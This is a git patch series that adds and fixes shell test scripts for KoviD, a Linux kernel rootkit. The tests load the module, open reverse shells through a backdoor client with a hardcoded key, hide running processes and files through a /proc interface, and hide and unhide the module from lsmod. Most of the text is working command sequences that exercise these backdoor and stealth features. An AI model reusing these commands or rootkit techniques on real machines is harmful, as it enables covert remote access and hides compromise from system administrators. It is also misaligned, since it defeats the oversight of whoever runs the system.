From ca3b18158f7dd4e03e35ae701bfeafba64883fe1 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 25 Nov 2024 12:17:12 +0100 Subject: [PATCH 01/11] test: Add backdoor+PID --- docs/TestFeatures.md | 1 + test/native/Inputs/simple-test.c | 6 +++++ test/native/nc-backdoor-plus-pid.test | 35 +++++++++++++++++++++++++++ test/native/nc-backdoor.test | 1 + 4 files changed, 43 insertions(+) create mode 100644 test/native/Inputs/simple-test.c create mode 100644 test/native/nc-backdoor-plus-pid.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index fc533eb..8186108 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -306,3 +306,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | tty backdoor | Yes | native/tty-backdoor.test | | backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | | Hide/Unhide Module | Yes | native/hide-unhide-module.test | +| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | diff --git a/test/native/Inputs/simple-test.c b/test/native/Inputs/simple-test.c new file mode 100644 index 0000000..f8528a7 --- /dev/null +++ b/test/native/Inputs/simple-test.c @@ -0,0 +1,6 @@ +int main() +{ + while(1); + + return 0; +} diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test new file mode 100644 index 0000000..24ca162 --- /dev/null +++ b/test/native/nc-backdoor-plus-pid.test @@ -0,0 +1,35 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko + +# Start the reverse shell in the background, suppressing its output +sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 & + +# Allow the reverse shell to initialize +sleep 1 + +# Send a signal to the "kill -CONT 31337" process as an additional check +kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process" + +# Run the `a.out` executable in the background and capture its PID +./Inputs/a.out & +AOUT_PID=$! + +# Wait briefly to ensure the process has started +sleep 1 + +# Hide the process using the backdoor functionality +echo -bd $AOUT_PID > /proc/myprocname + +# Attempt to kill the hidden process and verify that it fails +kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process" + +# Remove the module +sudo rmmod kovid + +# CHECK: sh: can't kill pid 31337: No such process +# CHECK: sh: can't kill pid {{.*}}: No such process diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test index 0f27278..225ee63 100644 --- a/test/native/nc-backdoor.test +++ b/test/native/nc-backdoor.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 4c1adeb27a61fe7a9d177a26c485d937ea761d72 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 25 Nov 2024 12:49:11 +0100 Subject: [PATCH 02/11] test: Add hide file test --- docs/TestFeatures.md | 1 + test/native/hiden-file.test | 39 +++++++++++++++++++++++++++ test/native/nc-backdoor-plus-pid.test | 1 + 3 files changed, 41 insertions(+) create mode 100644 test/native/hiden-file.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 8186108..c68b310 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -307,3 +307,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | | Hide/Unhide Module | Yes | native/hide-unhide-module.test | | backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | +| hide file | Yes | native/hiden-file.test | diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test new file mode 100644 index 0000000..7054d21 --- /dev/null +++ b/test/native/hiden-file.test @@ -0,0 +1,39 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 + +# Create a test directory and file +TEST_DIR="/tmp/test_hide_file" +TEST_FILE="hidden_file.txt" +mkdir -p "$TEST_DIR" +touch "$TEST_DIR/$TEST_FILE" + +# Create a file with the same name in another directory +OTHER_DIR="/tmp/other_dir" +mkdir -p "$OTHER_DIR" +touch "$OTHER_DIR/$TEST_FILE" + +# Hide the file using the backdoor +echo -a "$TEST_DIR/$TEST_FILE" > /proc/myprocname + +# Verify that the file is hidden when listing the directory +ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" + +# Check that files with the same name in other directories are also hidden +ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" + +# Cleanup +rm -rf "$TEST_DIR" "$OTHER_DIR" + +# Remove the kernel module +sudo rmmod kovid + +# CHECK: File is hidden + +# This does not work! +# CHECK-NOT: File is hidden in other directory diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test index 24ca162..ec3f9d3 100644 --- a/test/native/nc-backdoor-plus-pid.test +++ b/test/native/nc-backdoor-plus-pid.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 965f2177345accef4e8889789708b4a3e5fee646 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 25 Nov 2024 13:29:34 +0100 Subject: [PATCH 03/11] test: Fix hide file in all dirs --- docs/TestFeatures.md | 2 ++ test/native/hiden-file-in-all-dirs.test | 29 +++++++++++++++++++++++ test/native/hiden-file.test | 14 ++--------- test/native/unhide-module.test | 31 +++++++++++++++++++++++++ 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 test/native/hiden-file-in-all-dirs.test create mode 100644 test/native/unhide-module.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index c68b310..f1ffe14 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -308,3 +308,5 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | Hide/Unhide Module | Yes | native/hide-unhide-module.test | | backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | | hide file | Yes | native/hiden-file.test | +| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | +| unhide module | Yes (but does not work) | native/unhide-module.test | diff --git a/test/native/hiden-file-in-all-dirs.test b/test/native/hiden-file-in-all-dirs.test new file mode 100644 index 0000000..f559134 --- /dev/null +++ b/test/native/hiden-file-in-all-dirs.test @@ -0,0 +1,29 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 + +TEST_FILE="hidden_file.txt" + +# Create a file with the same name in another directory +OTHER_DIR="/tmp/other_dir" +mkdir -p "$OTHER_DIR" +touch "$OTHER_DIR/$TEST_FILE" + +# Hide the file using the backdoor +echo -g "$TEST_FILE" > /proc/myprocname + +# Check that files with the same name in other directories are also hidden +ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" + +# Cleanup +rm -rf "$OTHER_DIR" + +# Remove the kernel module +sudo rmmod kovid + +# CHECK: File is hidden in other directory diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test index 7054d21..785647c 100644 --- a/test/native/hiden-file.test +++ b/test/native/hiden-file.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -13,27 +14,16 @@ TEST_FILE="hidden_file.txt" mkdir -p "$TEST_DIR" touch "$TEST_DIR/$TEST_FILE" -# Create a file with the same name in another directory -OTHER_DIR="/tmp/other_dir" -mkdir -p "$OTHER_DIR" -touch "$OTHER_DIR/$TEST_FILE" - # Hide the file using the backdoor echo -a "$TEST_DIR/$TEST_FILE" > /proc/myprocname # Verify that the file is hidden when listing the directory ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" -# Check that files with the same name in other directories are also hidden -ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" - # Cleanup -rm -rf "$TEST_DIR" "$OTHER_DIR" +rm -rf "$TEST_DIR" # Remove the kernel module sudo rmmod kovid # CHECK: File is hidden - -# This does not work! -# CHECK-NOT: File is hidden in other directory diff --git a/test/native/unhide-module.test b/test/native/unhide-module.test new file mode 100644 index 0000000..fd31577 --- /dev/null +++ b/test/native/unhide-module.test @@ -0,0 +1,31 @@ +# REQUIRES: 0 +# REQUIRES: DEPLOY_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 + +# Define the correct key for unhiding the module +CORRECT_KEY="secret-key" + +# Attempt to unhide the module with incorrect keys +for RANDOM_KEY in "random-key1" "wrong-key2" "incorrect-key3"; do + sudo echo "$RANDOM_KEY" > /proc/myprocname 2>/dev/null || echo "Module not unhidden with $RANDOM_KEY" +done + +# Attempt to unhide the module with the correct key +sudo echo "$CORRECT_KEY" > /proc/myprocname && echo "Module unhidden with correct key" + +# Remove the module after testing +sudo rmmod kovid + +# CHECK: Module not unhidden with random-key1 +# CHECK: Module not unhidden with wrong-key2 +# CHECK: Module not unhidden with incorrect-key3 + +# This does not work. +# insmod: ERROR: could not insert module ./kovid.ko: Bad address +# CHECK-NOT: Module unhidden with correct key From 29189403598656f5fa1e036eb492c8e05956265d Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 25 Nov 2024 13:57:39 +0100 Subject: [PATCH 04/11] test: Add simple hello.ko insmod test We will use this for some massive test of kovid LKM --- test/native/Inputs/Makefile | 7 +++++++ test/native/Inputs/hello.c | 24 ++++++++++++++++++++++++ test/native/simple-insmod-hello-ko.test | 18 ++++++++++++++++++ 3 files changed, 49 insertions(+) create mode 100644 test/native/Inputs/Makefile create mode 100644 test/native/Inputs/hello.c create mode 100644 test/native/simple-insmod-hello-ko.test diff --git a/test/native/Inputs/Makefile b/test/native/Inputs/Makefile new file mode 100644 index 0000000..53ce8ac --- /dev/null +++ b/test/native/Inputs/Makefile @@ -0,0 +1,7 @@ +obj-m = hello.o + +all: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: + make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean diff --git a/test/native/Inputs/hello.c b/test/native/Inputs/hello.c new file mode 100644 index 0000000..353c00a --- /dev/null +++ b/test/native/Inputs/hello.c @@ -0,0 +1,24 @@ +#include +#include +#include + +MODULE_LICENSE("GPL"); + +MODULE_DESCRIPTION("A simple Hello world LKM!"); + +MODULE_VERSION("0.1"); + +static int __init hello_start(void) +{ + printk(KERN_INFO "Loading hello module...\n"); + printk(KERN_INFO "Hello world\n"); + return 0; +} + +static void __exit hello_end(void) +{ + printk(KERN_INFO "Goodbye!!!\n"); +} + +module_init(hello_start); +module_exit(hello_end); diff --git a/test/native/simple-insmod-hello-ko.test b/test/native/simple-insmod-hello-ko.test new file mode 100644 index 0000000..b3a6c22 --- /dev/null +++ b/test/native/simple-insmod-hello-ko.test @@ -0,0 +1,18 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +## Make sure you enter `test/native/Inputs` and run `make` +## in order to build `hello.ko`. + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 2 +sudo insmod ../../../test/native/Inputs/hello.ko +sudo rmmod hello +sudo dmesg + +# CHECK: Loading hello module... +# CHECK: Hello world From 0c5d7769c6359a3891d3bb949661879f13f2fc57 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 09:27:03 +0100 Subject: [PATCH 05/11] test: Fix hide-unhide-module.test --- Makefile | 7 +++++++ docs/TestFeatures.md | 2 +- test/native/hide-unhide-module.test | 4 +++- 3 files changed, 11 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 85a8177..9be8faf 100644 --- a/Makefile +++ b/Makefile @@ -11,8 +11,15 @@ AS=$(shell which as) CTAGS=$(shell which ctags) JOURNALCTL := $(shell which journalctl) UUIDGEN := $(shell uuidgen) + +# For tests, use hardcoded keys. +ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') +else +BDKEY=0x1 +UNHIDEKEY=0x2 +endif # PROCNAME, /proc/ interface. COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \ diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index f1ffe14..aaa277c 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../ If you want to build and run native tests only, just use: ``` -$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" +$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 ``` ## Building for Linux version other than native diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test index 59ed72e..96db504 100644 --- a/test/native/hide-unhide-module.test +++ b/test/native/hide-unhide-module.test @@ -8,8 +8,10 @@ sleep 10 sudo insmod ../../../build/kovid.ko lsmod | grep kovid -echo -h > /proc/myprocname +kill -CONT 31337 +echo hide-lkm > /proc/myprocname lsmod | grep kovid +echo unhide-lkm=2 > /proc/myprocname sudo rmmod kovid # CHECK: kovid From c9d0d153abf7bb1ef0f1f48c60d74a82d1041271 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 09:29:54 +0100 Subject: [PATCH 06/11] test: Fix hide files --- test/native/hiden-file-in-all-dirs.test | 3 ++- test/native/hiden-file.test | 3 +-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/test/native/hiden-file-in-all-dirs.test b/test/native/hiden-file-in-all-dirs.test index f559134..45a9d20 100644 --- a/test/native/hiden-file-in-all-dirs.test +++ b/test/native/hiden-file-in-all-dirs.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -15,7 +16,7 @@ mkdir -p "$OTHER_DIR" touch "$OTHER_DIR/$TEST_FILE" # Hide the file using the backdoor -echo -g "$TEST_FILE" > /proc/myprocname +echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname # Check that files with the same name in other directories are also hidden ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test index 785647c..ec7c388 100644 --- a/test/native/hiden-file.test +++ b/test/native/hiden-file.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -15,7 +14,7 @@ mkdir -p "$TEST_DIR" touch "$TEST_DIR/$TEST_FILE" # Hide the file using the backdoor -echo -a "$TEST_DIR/$TEST_FILE" > /proc/myprocname +echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname # Verify that the file is hidden when listing the directory ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" From d2a609646303b7bdfa61a4d575812ebf88713551 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 09:36:14 +0100 Subject: [PATCH 07/11] Improve docs for tests --- docs/TestFeatures.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index aaa277c..2934fb8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../ If you want to build and run native tests only, just use: ``` -$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 +$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 ``` ## Building for Linux version other than native @@ -111,7 +111,7 @@ $ make ``` # From root directory of the project $ mkdir build && cd build - $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" + $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 # Please run the command with only one Thread! $ make check-kovid -j1 ``` @@ -187,7 +187,7 @@ Usual set of commands to be used: $ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD $ git submodule update --init test/test-artefacts $ mkdir build && cd build -$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid +$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid ``` ## Insall dependecies and set up enviroment @@ -269,7 +269,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl ``` $ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1 -$ make PROCNAME="myprocname" DEPLOY=1 +$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1 $ make check-kovid ``` From 768fbe47c07dff7afa0809599ea9a6d038d16897 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 20:23:39 +0100 Subject: [PATCH 08/11] test: Fix nc bd test --- Makefile | 2 +- test/native/hiden-file.test | 1 + test/native/nc-backdoor.test | 3 +-- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Makefile b/Makefile index 9be8faf..aa480d3 100644 --- a/Makefile +++ b/Makefile @@ -17,7 +17,7 @@ ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') else -BDKEY=0x1 +BDKEY=0x7d3b1cb572f16425 UNHIDEKEY=0x2 endif diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test index ec7c388..aef8702 100644 --- a/test/native/hiden-file.test +++ b/test/native/hiden-file.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test index 225ee63..eb974fe 100644 --- a/test/native/nc-backdoor.test +++ b/test/native/nc-backdoor.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -8,7 +7,7 @@ sudo dmesg -c sleep 10 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid sudo dmesg From e39dca77bcc0b6aab54724caab61ee88f385d491 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 20:29:30 +0100 Subject: [PATCH 09/11] test: Fix native/nc-backdoor-plus-pid.test --- test/native/nc-backdoor-echo-s.test | 2 +- test/native/nc-backdoor-plus-pid.test | 3 +-- test/native/nc-backdoor.test | 1 + 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test index d983f4e..4820942 100644 --- a/test/native/nc-backdoor-echo-s.test +++ b/test/native/nc-backdoor-echo-s.test @@ -8,7 +8,7 @@ sudo dmesg -c sleep 10 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 echo -s > /proc/myprocname sudo rmmod kovid sudo dmesg diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test index ec3f9d3..a561e93 100644 --- a/test/native/nc-backdoor-plus-pid.test +++ b/test/native/nc-backdoor-plus-pid.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -24,7 +23,7 @@ AOUT_PID=$! sleep 1 # Hide the process using the backdoor functionality -echo -bd $AOUT_PID > /proc/myprocname +echo hide-task-backdoor=$AOUT_PID > /proc/myprocname # Attempt to kill the hidden process and verify that it fails kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process" diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test index eb974fe..be76639 100644 --- a/test/native/nc-backdoor.test +++ b/test/native/nc-backdoor.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 3d66c14ba2d59d0d0581c024479b510569b38f90 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Fri, 29 Nov 2024 20:41:23 +0100 Subject: [PATCH 10/11] test: Fix native/nc-backdoor-echo-s.test --- docs/TestFeatures.md | 2 +- test/native/nc-backdoor-echo-s.test | 11 +++++----- test/native/nc-backdoor-plus-pid.test | 1 + test/native/openssl-backdoor.test | 2 +- test/native/tty-backdoor.test | 2 +- test/native/unhide-module.test | 31 --------------------------- 6 files changed, 9 insertions(+), 40 deletions(-) delete mode 100644 test/native/unhide-module.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 2934fb8..fef71cb 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -309,4 +309,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | | hide file | Yes | native/hiden-file.test | | hide file (2) | Yes | native/hiden-file-in-all-dirs.test | -| unhide module | Yes (but does not work) | native/unhide-module.test | +| unhide module | Yes | native/hide-unhide-module.test | diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test index 4820942..22c3e3e 100644 --- a/test/native/nc-backdoor-echo-s.test +++ b/test/native/nc-backdoor-echo-s.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -9,7 +8,7 @@ sudo dmesg -c sleep 10 sudo insmod ../../../build/kovid.ko sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 -echo -s > /proc/myprocname +echo list-hidden-tasks > /proc/myprocname sudo rmmod kovid sudo dmesg @@ -17,9 +16,9 @@ sudo dmesg # CHECK: Waiting for event # CHECK: loaded # CHECK: Got event -# CHECK: hide [{{.*}}] {{.*}} -# CHECK: hide [{{.*}}] {{.*}} -# CHECK: BD : dash -# CHECK: BD : bash +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} # CHECK: Got event # CHECK: unloaded diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test index a561e93..b02c5be 100644 --- a/test/native/nc-backdoor-plus-pid.test +++ b/test/native/nc-backdoor-plus-pid.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/openssl-backdoor.test b/test/native/openssl-backdoor.test index 5ab43bd..0ee75fd 100644 --- a/test/native/openssl-backdoor.test +++ b/test/native/openssl-backdoor.test @@ -6,7 +6,7 @@ # RUN: FileCheck-18 --input-file=%t.log %s sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid # CHECK: ACCEPT diff --git a/test/native/tty-backdoor.test b/test/native/tty-backdoor.test index b404346..a884619 100644 --- a/test/native/tty-backdoor.test +++ b/test/native/tty-backdoor.test @@ -8,7 +8,7 @@ sudo dmesg -c sleep 20 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid sudo dmesg diff --git a/test/native/unhide-module.test b/test/native/unhide-module.test deleted file mode 100644 index fd31577..0000000 --- a/test/native/unhide-module.test +++ /dev/null @@ -1,31 +0,0 @@ -# REQUIRES: 0 -# REQUIRES: DEPLOY_ONLY -# REQUIRES: NATIVE_TESTS - -# RUN: bash %s > %t.log -# RUN: FileCheck-18 --input-file=%t.log %s - -sudo insmod ../../../build/kovid.ko -kill -CONT 31337 - -# Define the correct key for unhiding the module -CORRECT_KEY="secret-key" - -# Attempt to unhide the module with incorrect keys -for RANDOM_KEY in "random-key1" "wrong-key2" "incorrect-key3"; do - sudo echo "$RANDOM_KEY" > /proc/myprocname 2>/dev/null || echo "Module not unhidden with $RANDOM_KEY" -done - -# Attempt to unhide the module with the correct key -sudo echo "$CORRECT_KEY" > /proc/myprocname && echo "Module unhidden with correct key" - -# Remove the module after testing -sudo rmmod kovid - -# CHECK: Module not unhidden with random-key1 -# CHECK: Module not unhidden with wrong-key2 -# CHECK: Module not unhidden with incorrect-key3 - -# This does not work. -# insmod: ERROR: could not insert module ./kovid.ko: Bad address -# CHECK-NOT: Module unhidden with correct key From e1d319dbf06d979c18feecb1b04d0f668d5d627d Mon Sep 17 00:00:00 2001 From: djtodoro Date: Sun, 1 Dec 2024 18:26:16 +0100 Subject: [PATCH 11/11] NFC for tests --- docs/TestFeatures.md | 1 + test/native/hide-unhide-module.test | 1 - test/native/nc-backdoor-echo-s.test | 1 + 3 files changed, 2 insertions(+), 1 deletion(-) diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index fef71cb..7aa48b8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -109,6 +109,7 @@ $ make To simply run those (but make sure you followed the instructions for setting the enviroment described below): ``` + $ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1 # From root directory of the project $ mkdir build && cd build $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test index 96db504..13ceff5 100644 --- a/test/native/hide-unhide-module.test +++ b/test/native/hide-unhide-module.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test index 22c3e3e..4e1035d 100644 --- a/test/native/nc-backdoor-echo-s.test +++ b/test/native/nc-backdoor-echo-s.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS